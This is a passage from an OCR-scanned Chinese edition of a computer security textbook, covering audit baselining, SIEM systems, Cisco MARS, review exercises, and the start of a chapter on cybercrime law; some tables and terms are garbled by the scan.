基线 设置 ”基线 设置 是 根据 异常 事件 和 模式 来 定义 正常 事件 和 模式 的 过 程 。 该 过 程 包括 测 
量 一 组 已 知 数据 来 计算 正常 值 的 变化 范围 。 这 些 基线 值 可 以 与 新 的 数据 比较 来 检测 异常 变化 。 
与 基线 相关 的 活动 实例 包括 : 

e 每 个 协议 的 网 络 流量 总 和 : 总 的 HITP、 电 子 邮件 、FTP 等 的 流量 。 

e 登录 /退出 。 

。 管理 员 账 户 的 访问 。 

e 动态 主机 配置 协议 (DHCP) 地 址 管理 、DNS 请 求 。 

e 每 小 时 /天 日 志 数 据 的 总 量 。 

o 在 任何 时 间 运 行 的 进程 数 。 

例如 FTP 通信 流量 大 幅 增 加 可 能 表明 你 的 FTP 服务 器 已 经 受到 威胁 并 且 正 在 被 外 部 用 户 
恶意 使 用 。 

一 旦 建立 基线 ,依据 基线 进行 分 析 就 是 可 能 的 。 一 种 在 本 书 经 常 讨论 的 方法 是 异常 检测 。 
异常 检测 的 一 个 简单 方法 的 实例 是 免费 软件 Never Before Seen NBS) 异常 检测 驱动 程序 (www. 
ranum.com/security/computer_security/code)。 该 工具 实现 了 速度 非常 快 的 字符 串 数 据 库 查找 并 
告知 给 定 的 字符 串 是 否 存在 于 数据 库 中 ( 即 ， 已 经 出 现 )。 

考虑 下 面 涉 及 DHCP 的 实例 。DHCP 用 于 网 络 中 主机 的 TCP/IP 配置 。 在 一 个 操作 系统 启 
动 时 ， 客 户 端 主机 发 送 一 个 配置 请 求 , DHCP 服务 器 检测 到 该 请 求 后 ， 它 会 为 客户 端 工作 站 选 
择 适 当 的 配置 参数 (具有 相应 的 子 网 掩 码 和 其 他 可 选 参数 的 P 地 址 ， 诸 如 默认 网 关 的 中 地 址 、 
DNS 服务 器 的 地 址 和 域名 等 )。DHCP 服务 器 在 预定 范围 和 时 间 (租约 时 间 ) 给 客户 端 分 配 IP 
地 址 。 如 果 一 个 他 地址 需要 被 保留 ， 那么 客户 端 必须 在 租约 过 期 前 请 求 延期 。 如 果 客 户 端 不 
需要 延长 租约 时 间 ， 那 么 这 个 IP 地 址 就 会 被 视 为 是 可 用 的 ， 可 以 分 配给 另 一 个 客户 端 。 这 个 
规则 的 执行 是 自动 透明 的 。 使 用 NBS 可 以 很 容易 监控 机 构 的 网 络 ， 获 得 由 DHCP 服务 器 租用 
的 新 的 介质 访问 控制 /IP (MAC/IP) 组 合 。 管 理 员 立即 可 以 了 解 不 是 被 正常 租用 的 新 的 MAC 
地 址 和 IP 地 址 。 这 可 能 有 也 可 能 没有 安全 隐患 。NBS 还 可 以 用 于 扫描 不 正确 的 记录 、 异 常 的 
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客户 端 查询 以 及 各 种 其 他 模式 。 

另 一 种 基线 分 析 的 形式 是 阐 值 。 阐 值 是 超过 一 个 特定 基线 值 的 数据 的 标识 。 简 单 阐 值 用 于 
识别 事件 ， 如 连接 被 拒绝 超过 一 定 的 次 数 。 阔 值 也 可 以 用 于 关注 其 他 参数 ， 如 事件 的 发 生 频率 
而 不 是 简单 的 事件 数量 。 

设置 窗口 是 在 给 定 的 一 组 参数 下 的 事件 检测 ， 如 在 给 定 的 时 间 段 内 或 在 给 定时 间 段 外 的 事 
件 。 例 如 ， 为 每 个 用 户 在 一 天 内 设置 时 间 基线 ， 记 录 并 标记 设置 时 间 外 的 登录 事件 。 

关联 分 析 的 另 一 类 型 是 关联 ， 用 于 寻找 事件 之 间 的 关系 。 关 联 的 一 个 简单 实例 是 ， 给 定 
出 现 的 一 个 特定 的 日 志 消息 ， 在 第 二 次 出 现 该 消息 时 报警 。 例 如 ， 如 果 Snort (参阅 8.7 节 ) 报告 
来 自 远程 主机 的 一 个 缓冲 区 溢出 的 企图 ， 利 用 关联 可 以 获取 包含 远程 主机 的 IP 地 址 在 内 的 所 有 
消息 。 或 者 ， 管 理 员 可 能 会 记录 从 以 前 未 使 用 过 的 远程 主机 上 登录 的 某 个 账户 上 的 所 有 su 命令 。 


18.5 实例: 一 种 集成 的 方法 


[KELL06] 是 由 某 政府 部 门 的 信息 安全 官员 所 提供 的 报告 ， 该 报告 是 关于 她 试图 处 理 该 政 
府 部 门 的 网 络 、 服 务 器 和 主机 生成 的 大 量 的 安全 审计 数据 的 。 系 统 被 配置 为 能 够 为 管理 、 审 计 
员 和 律师 生成 有 用 的 审计 数据 ， 包 括 与 安全 相关 的 审计 数据 。 如 此 多 的 数据 生成 ， 使 得 安全 官 
员 很 难 实时 地 提取 有 用 的 信息 。 她 需要 得 到 和 分 析 来 自主 机 、 服 务 器 、 路 由 器 、 人 侵 检测 系 
统 、 防 火 墙 和 许多 其 他 安全 工具 的 与 安全 相关 的 数据 。 负 担 太 重 以 至 于 专门 用 一 台大 服务 器 运 
行 安全 分 析 软 件 和 存储 审计 文件 。 

当 执 行 基 本 安全 审计 分 析 的 一 项 任务 都 变 得 不 可 能 时 ， 该 安全 官员 意识 到 ， 设 置 基线 迫 在 
眉 睫 。 安 全 官员 需要 确定 正常 行为 和 阐 值 ， 以 便当 查 出 异常 现象 或 恶意 模式 时 ， 系 统 能 生成 报 
警 。 由 于 数据 量 大 ， 人 工 产生 甚至 人 工 辅 助 产生 基线 值 都 是 不 切实 际 的 。 由 于 存在 各 种 各 样 的 
审计 数据 源 和 审计 数据 格式 ， 因 此 看 起 来 没有 明显 的 好 方法 来 自动 生成 基线 值 。 

解决 上 述 问题 的 产品 称 为 安全 信息 管理 (SM) 系统 或 者 称 为 安全 信息 和 事件 管理 (SIEM) 
系统 。 因 为 这 些 产品 已 经 发 展 到 第 三 和 第 四 代 ， 故 产生 了 许多 其 他 的 名 字 ， 但 这 些 名 字 一 般 不 


”会 被 整个 产品 系列 普遍 接受 。 在 分 析 这 位 安全 官员 采取 的 具体 解决 方案 之 前 ， 我 们 给 出 SEM 


系统 一 个 简要 的 一 般 性 描述 。 
18.5.1 SIEM 系统 


SIEM 软件 是 一 个 集中 化 日 志 的 软件 包 ， 类 似 于 系统 日 志 但 是 比 系统 日 志 复杂 。SIEM 系 
统 提供 集中 化 、 统 一 的 审计 迹 存 储 工具 和 一 组 审计 数据 分 析 程 序 。 通 常 有 两 种 配置 方法 ,但 许 
多 产品 二 者 可 以 组 合 使 用 : 

e TRE: SEM 服务 器 从 独立 的 日 志 生成 主机 接收 数据 ， 而 无 须 在 那些 主机 上 安装 特 
殊 软件 。 有 些 服务 器 从 主机 提取 日 志 ， 这 要 求 该 服务 器 需要 通过 主机 对 其 进行 认证 才 
能 定期 地 检索 其 日 志 。 在 其 他 情况 下 ， 主 机 将 它们 的 日 志 推送 (push) 到 服务 器 ， 这 要 
求 主机 通过 服务 器 对 其 进行 认证 ， 然 后 才能 将 其 日 志 定 期 地 传送 到 服务 器 。 随 后 SIEM 
服务 器 进行 事件 过 滤 和 聚集 ， 以 及 对 收集 的 日 志 中 的 日 志 进 行 标准 化 和 分 析 。 
基于 代理 : 代理 程序 安装 在 日 志 生成 主机 进行 事件 过 滤 和 聚集 ， 以 及 对 一 种 特殊 类 型 
的 日 志 进 行 标准 化 ， 然 后 将 标准 化 的 日 志 数 据 传送 给 一 台 SIEM 服务 器 。 对 分 析 和 存 
储 来 说 ， 这 通常 是 实时 或 接近 实时 的 。 如 果 主 机 有 多 种 类 型 相关 的 日 志 ， 那 么 也 许 有 
必要 安装 多 个 代理 。 某 些 STEM 产品 也 提供 诸如 Syslog 和 SNMP 的 普通 格式 的 代理 。 
一 个 普通 代理 主要 从 这 样 的 信 源 得 到 日 志 数 据 : 信 源 数据 对 特殊 格式 代理 和 无 代理 方 
法 是 不 可 用 的 。 有 些 产品 也 允许 管理 员 创 建 定制 代理 来 处 理 无 其 他 支持 的 日 志 源 。 
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SIEM 软件 能 识别 各 种 各 样 的 日 志 格式 ， 包 括 来 自 各 种 各 样 操作 系统 、 安 全 软件 (如 IDS 
和 防火 墙 )、 应 用 服务 器 (如 Web 服务 器 、 电 子 邮件 服务 器 )， 甚 至 包括 物理 安全 控制 设备 〈 例 
如 标记 阅读 器 ) 的 日 志 。SIEM 软件 将 这 些 各 种 各 样 的 日 志 记录 标准 化 ， 以 便 使 所 有 日 志 记录 
中 的 同一 个 数据 项 (如 ，IP 地 址 ) 使 用 同一 种 格式 。 该 软件 可 以 删除 日 志 记 录 中 安全 功能 不 需 
要 的 某 些 域 ， 以 及 不 相关 的 某 些 日 志 记录 ， 这 样 很 大 程度 上 减少 了 中 央 日 志 的 数据 量 。SIEM 
服务 器 分 析 来 自 多 个 日 志 源 的 联合 数据 ， 关 联 日 志 记录 中 的 事件 ， 识 别 并 对 重要 事件 进行 优先 
排序 ， 如 果 需 要 的 话 启动 对 事件 的 响应 。SIEM 产品 通常 包含 以 下 几 个 对 用 户 很 有 用 的 特点 ， 
例如 : 
o 特别 设计 的 图 形 用 户 接口 (GUI)， 用 于 协助 分 析 员 确 定 潜 在 问题 ， 复 核 与 每 个 问题 相 
关 的 有 效 数 据 。 
e 一 个 安全 知识 库 ， 该 知识 库 包含 已 知 漏洞 的 信息 、 某 些 日 志 消 息 的 可 能 含义 和 其 他 技 
术 数 据 ; 日 志 分 析 员 能 经 常 按照 需要 定制 知识 库 。 . 
o 事件 跟踪 和 报告 的 功能 ， 有 时 具有 重 棒 性 工作 流 特征 。 
o 评估 信息 存储 和 关联 (例如 ， 为 目标 是 有 漏洞 的 操作 系统 或 一 个 更 加 重要 的 主机 的 攻 
击 设 定 更 高 的 威胁 级 别 )。 


18.5.2 ”安全 监控 、 分 析 和 响应 系统 


在 审核 了 几 个 选择 以 后 ， 安 全 官员 选择 了 最 经 济 的 思科 (Cisco) 系统 的 MARS 产品 。 
MARS 产品 支持 多 种 操作 系统 。 当 然 ， 站 点 上 所 有 的 思科 产品 与 该 产品 都 是 兼容 的 ， 包 括 
NetFlow 人 9 和 来 自 思科 路 由 器 、 防 火 墙 、 交 换 机 、 集 线 器 和 IDS 等 的 系统 日 志 数据 。 另 外 ， 
MARS 可 以 采集 几乎 所 有 启动 SNMP 和 系统 日 志 服务 的 设备 的 数据 ， 也 可 以 从 各 种 有 漏洞 的 
系统 和 反 病 毒 系统 、 主 机 操作 系统 、Web 服务 器 、Web 代理 设备 和 数据 库 服务 器 采集 数据 。 下 
列 是 MARS 支持 的 设备 和 软件 包 列 表 : 

o 网 络 (network): 思科 IOS 软件 、 思 科 Catalyst 操作 系统 、 思 科 NetFlow 和 Extreme 

Extremeware。 

© 防火 墙 /VPN : 思科 ASA 软件 、 思 科 PIX 安全 装置 、 思 科 IOS 防火 墙 、 思 科 防 火 墙 
服务 模块 (FWSM)、 思 科 VPN3000 集线器 、Checkpoint 防火 墙 -1 NG 和 VPN-1 版 、 
NetScreen 防火 墙 和 诺基亚 (Nokia) 防火 墙 。 

e 入 侵 检 测 : 思科 IDS ; 思科 IDS 模块 ; 思科 IOS IPS; Enterasys Dragon NIDS ; ISS 
RealSecure 网 络 传感器 ; Snort NIDS ; McAfee Intrushield NIDS ; NetScreen IDP ; 操作 
系统 和 赛 门 铁 克 ManHunt。 

。 漏洞 评估 : eEye REM, Qualys QualysGuard 和 Found Stone FoundScan。 

o 主机 安全 : 思科 安全 代理 ; McAfee Entercept 和 ISS RealSecure 主机 传感器 。 

反 病 毒 : 赛 门 铁 克 反 病 毒 (Symantec Antivirus)， 思 科 事 故 控制 系统 (Cisco ICS), Trend 
Micro 病毒 爆发 预防 ( OPS)， 网 络 相 关 的 病毒 扫描 (Network Associates Virus Scan) 和 
McAfee ePO。 

e 认证 服务 器 : 思科 安全 ACS。 

主机 日 志 : Windows NT、2000、2003 (代理 和 无 代理 ); Solaris 和 Linux, 

应 用 程序 : Web 服务 器 (IIS、iPlanet 和 Apache); Oracle 审计 日 志和 网 络 设备 NetCache。 


O NetFlow 是 由 思科 系统 开发 运行 在 网 络 设备 的 开源 但 专用 的 网 络 协议 ， 例 如 用 于 收集 P 流量 信息 的 路 由 器 
和 LAN 交换 机 。 在 RFC3954 中 有 文件 记录 。 
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e 通用 设备 支持 : 集中 和 监控 任何 应 用 系统 日 志 。 

MARS 在 无 代理 配置 下 工作 ， 使 用 一 个 集中 式 专用 服务 器 。 一 般 ， 服 务 器 执行 以 下 步 又: 

1. 事件 从 整个 网 络 上 的 设备 和 软件 模块 进入 MARS 服务 器 。 

2. 事件 被 解析 用 于 在 记录 中 定位 和 识别 每 一 个 域 。 

3. MARS 将 每 个 记录 标准 化 成 为 通用 审计 迹 记 录 格 式 。 

4. MARS 执行 关联 功能 ， 用 以 发 现 相 关 的 事件 并 定义 会 话 。 每 个 会 话 是 一 组 相关 的 事件 。 
例如 ， 检 测 到 一 个 蠕虫 ， 那 么 在 所 有 设备 上 发 生 的 事件 被 关联 到 有 关 这 次 蠕虫 攻击 的 一 个 会 
话 上 。 

5. 会 话 和 未 关联 的 事件 是 在 规则 引擎 下 执行 的 ， 并 对 每 一 个 进行 评估 。 有 些 事件 和 会 话 如 
训 不 相关 则 会 被 剔除 。 其 余 的 事件 作为 事故 被 重新 分 类 并 记录 到 事故 数据 库 。 

6. 对 数据 进行 误 报 分 析 ， 目 的 是 获取 网 络 上 的 IDS 和 其 他 系统 的 误 报 分 析 报 告 。 

7. 针对 被 怀疑 的 主机 执行 漏洞 评估 用 于 确定 数据 的 紧急 性 。 

8. 流量 分 析 和 基于 统计 的 异常 检测 程序 基于 给 定 的 数据 运行 。 

MARS 提供 大 量 分 析 工 具 包 和 一 个 有 效 的 图 形 用 户 接口 (GUI)。 初 步 显 示 这 个 产品 将 满 
足 安全 官员 的 需要 。 


18.6 ”推荐 读物 


文献 [CCPS12b]、[FRAS97] 和 [NIST95] 中 都 含有 关于 安全 审计 的 有 用 章节 。 以 下 标准 文 
件 涵盖 本 章 所 有 主题 : [KENT06] 和 [ITUT95]。[KUPE04] 对 这 个 主题 进行 了 详细 讨论 ， 篇 幅 
很 长 。 

[EATO03] 是 一 篇 有 关系 统 日 志 (Syslog) 的 优秀 文章 。 

[MERC03] 讨论 了 审计 迹 及 其 恰当 使 用 的 问题 。[SING04] 对 UNIX 系统 日 志和 Windows 
事件 日 志 进 行 了 详细 的 描述 。[ZHOU04] 讨论 了 不 需要 再 编译 的 应 用 程序 级 审计 技术 。 
[HELM93] 基于 审计 迹 的 分 析 提出 误 用 检测 统计 模型 ， 并 且 表 明 仔 细 选 择 特征 可 以 改进 检测 的 
准确 性 。 
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EATOO3 Eaton, I. The Ins and Outs of System Logging Using Syslog. SANS Institute 
InfoSec Reading Room, February 2003. 
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SINGO04 Singer, A., and Bird, T. Building a Logging Infrastructure. Short Topics in 
System Administration, Published by USENIX Association for Sage, 2004. 
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Computer Security Applications Conference (ACSAC‘04), 2004. 607 


18.7 关键 术语 、 复 习题 和 习题 

关键 术语 

anomaly detection (异常 检测 ) security audit (安全 审计 ) 
application-level audit trail (应 用 程序 级 审计 迹 ) security audit trail (安全 审计 迹 ) 

audit (审计 ) security information and event management ( SIEM, 
audit review (审计 复核 ) 安全 信息 和 事件 管理 ) 

audit trail (审计 迹 ) shared library (共享 库 ) 

audit trail analysis (审计 迹 分 析 ) statically linked library (静态 链接 库 ) 
baselining (基线 设置 ) . statically linked shared library (静态 链接 共享 库 ) 
dynamic binary rewriting (动态 二 进 制 重 写 ) Syslog (系统 日 志 ) 

dynamically linked shared library (动态 链接 共享 库 ) system-level audit trail (系统 级 审计 迹 ) 
interposable library (插入 库 ) thresholding (BIÉ) 

loadable modules (可 装载 模块 ) user-level audit trail (用 户 级 审计 迹 ) 
log (日 志 ) windowing (窗口 ) 

physical access audit trail (物理 访问 审计 迹 ) 

复习 题 

18.1 解释 安全 审计 消息 和 安全 报警 之 间 的 区 别 。 

18.2” 列 出 并 简要 地 描述 安全 审计 和 报警 模型 的 组 件 。 

18.3” 列 出 并 简要 地 描述 安全 审计 的 主要 功能 。 

18.4 ”审计 数据 应 该 在 什么 范围 (数据 的 类 别 ) 内 收集 ? 

18.5 列 出 并 解释 4 个 不 同类 别 的 审计 迹 的 区 别 。 

18.6 UNIX 的 Syslog 工具 的 主要 组 件 是 什么 ? 

18.7 解释 插入 库 怎样 应 用 于 应 用 程序 级 审计 。 

18.8 解释 审计 复核 和 审计 分 析 之 间 的 区 别 。 

18.9 什么 是 安全 信息 和 事件 管理 (SIEM) 系统 ? 

习题 

18.1 ”比较 表 18-2 MH 18-3， 讨 论 其 中 重 释 和 不 重合 的 部 分 以 及 它们 的 意义 。 


18.2 


a. 有 没有 在 表 18-2 可 以 找到 而 表 18-3 中 没有 的 项 ? 讨论 其 中 的 理由 。 

b. 有 没有 在 表 18-3 可 以 找到 而 表 18-2 中 没有 的 项 ? 讨论 其 中 的 理由 。 

[KUPE04] 中 给 出 了 可 审计 事件 的 另 一 列表 ， 如 表 18-6 所 示 ， 将 此 表 与 表 18-2 和 表 18-3 进行 
比较 。 

a. 有 没有 在 表 18-2 和 表 18-3 可 以 找到 而 表 18-6 中 没有 的 项 ? 讨论 其 中 的 理由 。 

b. 有 没有 在 表 18-6 可 以 找到 而 表 18-2 和 表 18-3 中 没有 的 项 ? 讨论 其 中 的 理由 。 


18.3 讨论 在 18.5 节 提 到 的 基于 代理 和 无 代理 的 SIEM 软件 方法 的 优点 和 缺点 。 608 
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身份 认证 

。 口令 更 改 

。 失败 的 登录 事件 

。 成 功 的 登录 尝试 

。 终端 类 型 

。 登录 地 点 

。 查询 用 户 身份 

。 不 存在 的 账户 的 登录 尝试 
。 使 用 的 终端 

。 登录 类 型 (交互 / 自动 ) 
。 认证 方法 

。 退出 时 间 

。 总 的 连接 时 间 

。 退 出 原因 


操作 系统 的 操作 

。 审计 启用 

。 试图 关闭 审计 

。 试图 改变 审计 配置 


。 将 一 个 对 象 放 人 另 一 用 户 内 存 空间 
。 从 其 他 用 户 存储 空间 删除 对 象 


。 改变 特权 
。 改变 组 标签 
© 使 用 “敏感 ”命令 


成 功 的 程序 访问 
。 命令 名 和 参数 
。 使 用 的 时 间 

。 使 用 的 日 期 

。 占用 的 CPU 时 间 
。 占用 时 间 

。 访问 的 文件 

。 访问 的 文件 数 
。 使 用 的 最 大 内 存 


表 18-6 建议 审计 的 事件 列表 


失败 的 程序 访问 


系统 级 参数 

系统 级 CPU 活动 (装载 ) 
系统 级 磁盘 活动 
系统 级 内 存 使 用 


文件 访问 

。 文件 创建 

。 文件 读 取 

。 文件 写 人 

。 文件 删除 

。 试图 访问 另 一 个 用 户 的 文件 
。 试图 访问 “敏感 ”文件 

。 失败 的 文件 访问 

。 访问 权限 改变 

。 标签 改变 


。 目录 修改 


文件 信息 
。 名 字 
。 Yay Rk 
。 类 型 
。 内 容 
。 所 有 者 
。 组 

。 许可 
。 标签 
。 物理 设备 
。 磁盘 块 





用 户 交 互 

° AKER 

。 键入 错误 

。 键 人 的 时 间 间 隔 

。 键 人 的 节奏 

。 压力 的 模拟 量 

。 窗口 事件 

。 一 个 地 点 的 多 个 事件 
。 存在 事件 的 多 个 地 点 
。 鼠标 移动 

。 鼠标 点 击 

。 空闲 时 间 

。 连接 时 间 

。 从 终端 发 送 的 数据 
。 发 送 到 终端 的 数据 


打印 的 硬 拷贝 


网 络 活动 

。 收 到 的 包 

。 协议 

。 源 地 址 

。 目的 地 址 

。 源 端口 

。 目的 端口 

。 长 度 

。 载荷 大 小 

。 载荷 

o RRA 

。 标志 

。 被 打开 的 端口 
。 被 关闭 的 端口 
。 请求 的 连接 
。 关闭 的 连接 
。 连接 重 置 

。 机 器 性 能 下 降 


| 第 19 章 


Computer Security: Principles and Practice, Third Edition 


法 律 与 道德 问题 





学 习 目标 

学 习 完 本 章 之 后 ， 你 应 该 能 够 : 

o 讨论 计算 机 犯罪 的 不 同类 型 ; 
理解 知识 产权 的 类 型 ; 


e 
© 概述 隐私 权 方 面 的 关键 问题 ; 
© 比较 和 对 比 编纂 计算 机 伦理 的 方法 。 





计算 机 安全 的 法 律 和 道德 问题 涉及 的 范围 非常 广 ， 全 部 讨论 的 话 ， 将 远 远 超出 本 书 的 范 
围 。 本 章 我 们 讨论 该 领域 里 几 个 重要 的 问题 。 


19.1 网 络 犯罪 和 计算 机 犯罪 


本 书 使 用 很 大 的 篇 幅 分 析 了 计算 机 和 网 络 攻击 的 检测 、 阻 止 和 恢复 等 方面 的 技术 方法 。 第 
16 章 和 第 17 章 分 别 研究 了 用 于 加 强 计算 机 安全 的 物理 安全 方法 和 与 人 为 因素 相关 的 方法 。 所 
有 这 些 方法 ， 虽 然 能 够 明显 提升 计算 机 的 安全 性 ， 但 是 检测 和 阻止 并 不 能 保证 完全 成 功 。 另 外 
一 种 应 对 攻击 的 手段 是 执法 威 敢 。 许 多 类 型 的 计算 机 攻击 可 以 被 认为 是 犯罪 ， 因 此 会 受到 法 律 
制裁 。 这 一 节 我 们 从 计算 机 犯罪 的 分 类 开始 介绍 ， 之 后 讨论 在 处 理 计算 机 犯罪 的 执法 过 程 中 所 
面临 的 特有 的 挑战 。 


19.1.1 计算 机 犯罪 的 类 型 


术语 计算 机 犯罪 或 者 网 络 犯 罪 广 泛 用 于 描述 以 计算 机 或 者 计算 机 网 络 作为 工具 、 目 标 或 者 
犯罪 场所 S 的 犯罪 行为 。 这 些 分 类 并 不 是 互 斥 的 ， 而 且 许 多 活动 可 以 属于 其 中 的 一 类 或 者 其 中 
的 几 类 。 网 络 犯 罪 具 有 犯罪 行为 使 用 到 了 网 络 这 一 内 涵 ， 而 计算 机 犯罪 可 以 涉及 网 络 ， 也 可 以 
不 涉及 。 

美国 司法 部 [DOJ00]， 根 据 计算 机 在 犯罪 活动 中 所 起 的 作用 ,将 计算 机 犯罪 进行 了 以 下 
分 类 : 

© 将 计算 机 作为 攻击 目标 (computer as target): 这 种 形式 的 犯罪 把 计算 机 系统 作为 目标 ， 

不 经 过 授权 或 付费 (窃取 服务 ) 就 获取 计算 机 系统 上 存储 的 信息 ， 对 目标 计算 机 系统 进 
行 控制 ， 或 者 改变 数据 的 完整 性 或 影响 计算 机 或 服务 器 的 可 用 性 。 用 第 1 章 中 的 术语 
描述 就 是 ， 这 种 形式 的 犯罪 包括 针对 数据 完整 性 、 系 统 完整 性 、 数 据 机 密 性 、 隐 私 和 
可 用 性 进行 的 攻击 。 

© 将 计算 机 作为 存储 设备 (computers as storage device): 通过 把 计算 机 或 者 计算 机 设备 作 

为 一 个 被 动 的 存储 媒介 ， 进 行 更 深层 次 的 非法 活动 。 例 如 ， 计 算 机 能 够 被 用 来 存储 窃 
取 的 口令 列表 、 信 用 卡号 、 公 司 内 部 信息 、 色 情 影 像 文件 或 者 “warez” (盗版 的 商业 
软件 )。 


日 ”这 个 定义 来 源 于 纽约 法 学 院 的 课程 ， 这 些 课 程 包括 网 络 犯罪 、 网 络 铠 怖 主义 和 数字 执法 Digital Law 


Enforcement) (information-retrieval.info/cybercrime/index.html ) 。 
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© 将 计算 机 作为 通信 工具 (computer as communications tool): 多 数 这 种 类 型 的 犯罪 属于 在 
线 进行 的 简单 传统 的 犯罪 。 例 子 包 括 ， 非 法 出 售 处 方药 、 违 禁 商 品 、 酒 类 和 枪支 ， 诈 
骗 ， 赌 博 和 传播 儿童 色情 内 容 等 。 
有 关 更 详细 的 计算 机 犯罪 列表 ， 在 国际 网 络 犯罪 公约 (Convention on Cybercrime) S 中 给 
出 了 其 定义 ， 如 表 19-1 所 示 。 这 个 表 非 常 有 用 ， 因 为 它 代表 了 一 种 国际 的 共识 一 一 关于 哪些 
犯罪 能 构成 计算 机 犯罪 或 者 网 络 犯罪 ， 以 及 哪些 犯罪 被 公认 为 是 重要 的 。 


表 19-1 引 自 《 网 络 犯罪 公约 》 的 网 络 犯罪 类 型 
条 款 2 非法 访问 
未 经 授权 访问 计算 机 系统 的 全 部 或 者 任何 部 分 。 
条 款 3 ”非法 拦截 


采用 技术 手段 ， 未 经 授权 地 拦截 由 计算 机 传 出 、 传 人 到 计算 机 上 或 者 计算 机 系统 内 部 的 非 公开 计算 机 数据 传输 ， 
包括 从 计算 机 系统 发 出 的 携带 计算 机 数据 的 电磁 辐射 。 


KR 4 数据 干扰 
未 经 授权 损坏 、 删 除 、 改 变 或 者 抑制 计算 机 数据 。 
条 款 5 系统 干扰 
未 经 授权 通过 输入 、 传 输 、 损 坏 、 删 除 、 改 变 或 者 抑制 计算 机 数据 ， 严 重 影响 计算 机 系统 的 功能 。 
RKO 设备 误 用 
a. 生产 、 销 售 、 采 购 、 进 口 、 分 发 或 者 以 其 他 形式 制造 流通 以 下 物品 : 
i 一 种 设备 ， 包 括 计算 机 程序 ， 被 设计 和 改造 成 以 进行 条 款 2 ~ 5 指明 的 任何 犯罪 活动 为 主要 目的 。 


这 一 个 计算 机 口令 、 访 问 代 码 或 者 类 似 的 数据 ， 通 过 它 可 以 访问 计算 机 系统 部 分 或 者 全 部 ， 且 具有 使 其 用 于 条 
款 2 一 5 指明 的 任何 犯罪 活动 的 动机 。 
b 拥有 以 上 ai 或 者 aii 段落 提 及 的 物品 ， 并 具有 实施 条 款 2 ~ 5 所 指明 的 任何 犯罪 活动 的 动机 。 在 追加 刑事 责任 
前 ,法 律 要 求 当事人 拥有 一 定数 量 的 这 些 物品 。 
条 款 7 计算 机 相关 的 伪造 


通过 输入 、 改 变 、 删 除 或 者 抑制 计算 机 数据 ， 故意 致使 不 真实 的 数据 被 认为 是 真实 的 ， 且 是 用 于 合法 目的 的 , 无 
论 这 些 数据 是 否 是 直接 可 读 的 和 可 理解 的 。 


条 款 8 计算 机 相关 的 诈骗 
通过 以 下 方式 ， 引 起 他 人 财产 丧失 : 
a. 任何 对 计算 机 数据 的 输入 、 改 变 、 删 除 或 者 抑制 。 


b. 任何 未 经 授权 ， 以 为 自身 或 他 人 牟取 经 济 利益 为 目的 ， 并 具有 欺骗 或 不 诚实 信用 的 主观 故意 ， 对 计算 机 系统 的 
功能 进行 干扰 的 行为 。 


条 款 9 与 儿童 色情 有 关 的 犯罪 

a. 生产 儿童 色情 制品 ， 并 以 使 用 计算 机 系统 将 其 传播 为 目的 。 

b. 通过 计算 机 系统 提供 或 者 生产 流通 儿童 色情 制品 。 

c. 通过 计算 机 系统 散播 或 者 传递 儿童 色情 制品 。 

d 通过 计算 机 系统 为 自己 或 者 他 人 获取 儿童 色情 制品 。 

e. 在 计算 机 系统 中 或 者 在 计算 机 数据 存储 介质 上 储存 儿童 色情 制品 。 
条 款 10 ”对 版 权 及 其 相关 权利 的 侵权 

条 款 11 企图 、 帮 助 或 教唆 行为 


帮助 和 教唆 实施 本 公约 条 款 2 ~ 10 规定 的 任何 犯罪 活动 。 企 图 实施 本 公约 条 款 3 ~ 5、7、8 以 及 条 款 9.1.a Alc 
指定 的 任何 犯罪 活动 。 


O 2001 年 网 络 犯罪 公约 是 第 一 个 国际 条 约 ， 该 条 约 旨 在 通过 统一 国家 法 律 ， 增 加 技术 投资 和 加 强 各 国 间 的 合 
作 来 解决 网 络 犯罪 问题 。 它 是 由 欧洲 理事 会 发 起 的 而 且 是 被 包括 美国 在 内 的 43 个 国家 认可 的 。 这 份 公约 包 
含 一 项 网 络 犯 罪 列 表 ， 每 个 签约 国 必须 将 其 移 到 自己 的 法 律 中 。 
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然而 ， 在 CERT 2007 年 电子 犯罪 调查 ( E-crime Survey) 年 度 报 告 中 ， 采 用 了 另外 一 种 分 
类 方法 ， 如 表 19-2 所 示 。 表 中 第 二 列 的 数字 表明 受 访 者 报告 至 少 发 生 过 一 次 相应 行 中 类 别 事 
件 的 比例 。 其 余 三 列 中 的 数字 表明 受 访 者 报告 受到 过 已 知 攻击 源 攻 击 的 比例 9。 


表 19-2 观察 CERT 2007 电子 犯罪 调查 结果 


RE MATER Hae | oof oe 26 
未 经 授权 访问 /使 用 信息 、 系 统 或 者 网 络 10 
非法 制造 垃圾 邮件 上 | | 
间谍 软件 (不 包括 恶意 广告 ) 18 
炊 骗 (信用 卡 诈骗 等) | 4 | w | 2 | s 


网 络 钓鱼 ( 某 人 在 网 上 冒充 你 们 公司 企图 获取 你 们 客户 和 员工 pw fos [os | 5 
的 个 人 资料 ) 


盗用 其 他 信息 (财产 )， 包 括 消费 者 记录 、 财 务 记录 等 | ao | 23 | w | 6 
BENRA RE SURE 9 
破坏 : 善意 破坏 、 删 除 或 者 毁坏 信息 、 系 统 或 者 网 络 | 30 | 4 |n | 6 





SUR HALL /僵尸 程序 (bot) /通过 僵尸 网 络 使 用 网 络 ae ae ee 10 


19.1.2 ”执法 面临 的 挑战 


在 计算 机 和 网 络 攻击 方面 ， 执 法 的 威慑 作用 与 逮捕 和 起 诉 罪犯 的 成 功率 有 关 。 而 网 络 犯 
罪 的 本 质 ， 决 定 了 对 网 络 罪犯 的 逮捕 和 起 诉 想 要 得 到 一 贯 的 成 功 是 非常 困难 的 。 为 了 理解 这 一 
点 ， 需 要 参考 [KSHE06 ] 中 提 到 的 ， 什 么 是 网 络 犯罪 的 恶性 循环 ， 其 中 涉及 执法 机 构 、 网 络 
罪犯 和 网 络 受害 者 。 

对 于 执法 机 构 (law enforcement agency)， 网 络 犯罪 提出 了 一 些 特有 的 难题 。 要 进行 适当 的 
调查 需要 相当 熟练 地 掌握 相关 的 技术 。 虽 然 一 些 机 构 ， 特 别 是 大 型 机 构 ， 在 这 一 领域 正在 努力 
追赶 ， 但 是 许多 司法 部 门 的 调查 员 缺 乏 处 理 这 类 犯罪 的 知识 和 经 验 。 另 一 个 障碍 是 相关 资源 的 
缺乏 。 一 些 网 络 犯罪 调查 需要 有 相当 高 的 计算 机 处 理性 能 、 通 信 能 力 和 存储 能 力 ， 这 可 能 超出 
了 司法 部 门 的 预算 。 网 络 犯 罪 的 全 球 性 本 质 上 成 了 一 个 附加 的 障碍 : 许多 案件 中 罪犯 远离 目标 
